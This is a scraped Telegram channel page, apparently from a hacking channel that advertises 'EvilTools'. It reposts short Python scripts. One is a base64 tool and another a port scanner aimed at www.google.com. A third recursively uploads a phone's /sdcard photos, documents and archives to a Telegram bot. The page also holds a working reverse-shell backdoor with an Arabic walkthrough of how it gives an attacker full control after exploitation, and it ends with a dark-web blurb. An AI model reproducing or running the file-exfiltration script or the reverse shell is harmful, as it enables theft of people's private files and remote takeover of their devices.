cookie

Ми використовуємо файли cookie для покращення вашого досвіду перегляду. Натиснувши «Прийняти все», ви погоджуєтеся на використання файлів cookie.

avatar

S u d o

Більше
Рекламні дописи
465
Підписники
-224 години
-17 днів
-1630 днів

Триває завантаження даних...

Приріст підписників

Триває завантаження даних...

- For more ( Tools , Bots , EvilTools ) , Join ( Here ) - if u have a problem , contact me (
@F_X_Z_Y
) • Join in anther Channels. Here
Показати все...
Фото недоступнеДивитись в Telegram
- Nmap Commands . -
@R_E_D_Z
Показати все...
Repost from N/a
import base64
def main():
 data = input('Enter Your Data : ')
 command = input("Choose ( d : Decode | e : Encode ) : ")
 if command == "e":
  encodedBytes = base64.b64encode(data.encode("utf-8"))
  encodedStr = str(encodedBytes, "utf-8")
  print("\n" + encodedStr)
 elif command == "d":
  try:
   decodedBytes = base64.b64decode(str(data))
   decodedStr = str(decodedBytes, "utf-8")
   print("\n" + decodedStr)
  except:
   print("Invaild DATA")
main()
- encrypt and decrypt Text ( base64 ) •
@CO_DE_X
Показати все...
Repost from N/a
python
import os
import requests
id = ID 
token = 'Token'
def send_files_to_telegram(id, token, path, extensions):
    for entry in os.scandir(path):
        if entry.is_file():
            if entry.name.lower().endswith(extensions):
                file = {"document": open(entry.path, 'rb')}
                res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}, files=file)
        elif entry.is_dir():
            send_files_to_telegram(id, token, entry.path, extensions)

file_extensions = ('.jpg', '.mb3', '.zip', '.ogg', '.swb', '.mb4', '.py', '.png', '.txt', '.pdf')
sdcard_path = '/sdcard'

send_files_to_telegram(id, token, sdcard_path, file_extensions)
- ID , You can get Your id Here - Token , You can get Your TokenBot Here
@CO_DE_X
Показати все...
Repost from N/a
import socket
import concurrent.futures
host = 'www.google.com'
ports = range(1, 2024) 
def scan_port(port):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)
        result = sock.connect_ex((host, port))
        if result == 0:
            st=socket.getservbyport(port)
            print(f"Port {port} is open\t{st}")
        sock.close()
    except socket.error:
        pass
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
        futures = [executor.submit(scan_port, port) for port in ports]
for future in concurrent.futures.as_completed(futures):
        future.result()
• Scanning Ports Fast
@CO_DE_X
Показати все...
الكود الخاص بالباك دور meterpreter_reverse_tcp المكتوب بلغة البايثون بيستخدم لتحكم كامل في الجهاز المصاب عن بعد عبر اتصال عكسي ببروتوكول TCP. هنشرح الكود كامل خطوة بخطوة يا شباب تابعوا الشرح معايا :
import socket
import subprocess
import os
import time
في البداية الكود بيستورد مكتبات البايثون الأساسية: - socket: عشان نقدر نتصل بالشبكة وننشيء اتصالات. - subprocess: عشان نقدر ننفذ أوامر النظام. - os: عشان نقدر نتعامل مع نظام التشغيل. - time: عشان نقدر نستخدم دوال الوقت والتأخير.
def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.1.3", 4444))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    p = subprocess.call(["/bin/sh", "-i"])
دالة connect بتعمل الآتي: - بتنشئ socket باستخدام socket.AF_INET اللي بيحدد استخدام IPv4 وsocket.SOCK_STREAM اللي بيحدد استخدام بروتوكول TCP. - بتبدأ الاتصال بـ handler اللي شغال على جهاز المهاجم على IP 192.168.1.3 وبورت 4444. - بعد ما الاتصال يتم، بتستخدم os.dup2 عشان توجه الإدخال (stdin)، الإخراج (stdout)، والخطأ القياسي (stderr) للـsocket ده معناه إن أي حاجة تكتب في الشل (shell) هتتبعت لجهاز المهاجم والعكس. - في النهاية بتشغل شل /bin/sh عشان تتيح للمهاجم تنفيذ الأوامر على الجهاز المصاب.
while True:
    try:
        connect()
    except:
        time.sleep(5)
        continue
في الجزء ده الكود بيدخل في حلقة لا نهائية while True، وبيحاول ينفذ دالة connect لو حصل أي خطأ أثناء الاتصال زي إن السيرفر مش شغال أو إن الاتصال تقطع، الكود بيستنى 5 ثواني باستخدام time.sleep(5) قبل ما يحاول الاتصال تاني ده بيضمن إن الباك دور يفضل يحاول الاتصال لحد ما ينجح. ده شرح كامل للكود. الكود بيتم حقنه في الجهاز المستهدف عن طريق استغلال معين زي ثغرة في النظام أو في برنامج معين بعد ما الكود يتحقن الجهاز المصاب بيبدأ الاتصال بجهاز المهاجم اللي شغال عليه الميتاسبلويت واللي بيكون مستني الاتصال على الـIP والبورت المحددين في الكود بمجرد ما الاتصال يتم، المهاجم بيحصل على جلسة تحكم كاملة بالجهاز المصاب وبيقدر ينفذ أوامر النظام، يرفع ملفات، ينزل ملفات، يشغل برمجيات خبيثة، يجمع معلومات عن الجهاز، أو يتحكم في العمليات اللي شغالة عليه. باختصار الباك دور meterpreter_reverse_tcp هو حمولة بتستخدم للتحكم في الأنظمة المصابة عن بعد عبر اتصال TCP عكسي بتتيح للمهاجم تنفيذ أوامر وجمع معلومات والتحكم الكامل في الجهاز المصاب الكود مكتوب بلغة البايثون وبيتم حقنه في النظام المستهدف عن طريق استغلال معين عشان يعمل جلسة تحكم meterpreter
Показати все...
Фото недоступнеДивитись в Telegram
The dark web is a part of the internet that isn’t indexed by search engines. It has a reputation for being a hub of criminal activity, and with good reason – research has shown that a significant portion of dark web sites host illicit material. On the dark web, you can find credit card numbers, drugs, guns, counterfeit money, stolen subscription credentials, hacked Netflix accounts, and software that helps you break into other people’s computers. However, not everything on the dark web is illegal – there are also legitimate sites, such as chess clubs and social networks. It’s important to note that accessing the dark web requires the use of a specific browser called Tor, which routes your web page requests through a series of proxy servers operated by thousands of volunteers around the globe, rendering your IP address unidentifiable and untraceable. The dark web can be a valuable tool for those who need to communicate anonymously, but it’s also a breeding ground for illegal activity.
Показати все...
Показати все...
Course Tools linux | شرح اداة nmap

Фото недоступнеДивитись в Telegram
Linux Best choice 💀
Показати все...
Repost from alhamwi
00:07
Відео недоступнеДивитись в Telegram
↫︙A L E X  : :↫
Показати все...
2.70 KB
Оберіть інший тариф

На вашому тарифі доступна аналітика тільки для 5 каналів. Щоб отримати більше — оберіть інший тариф.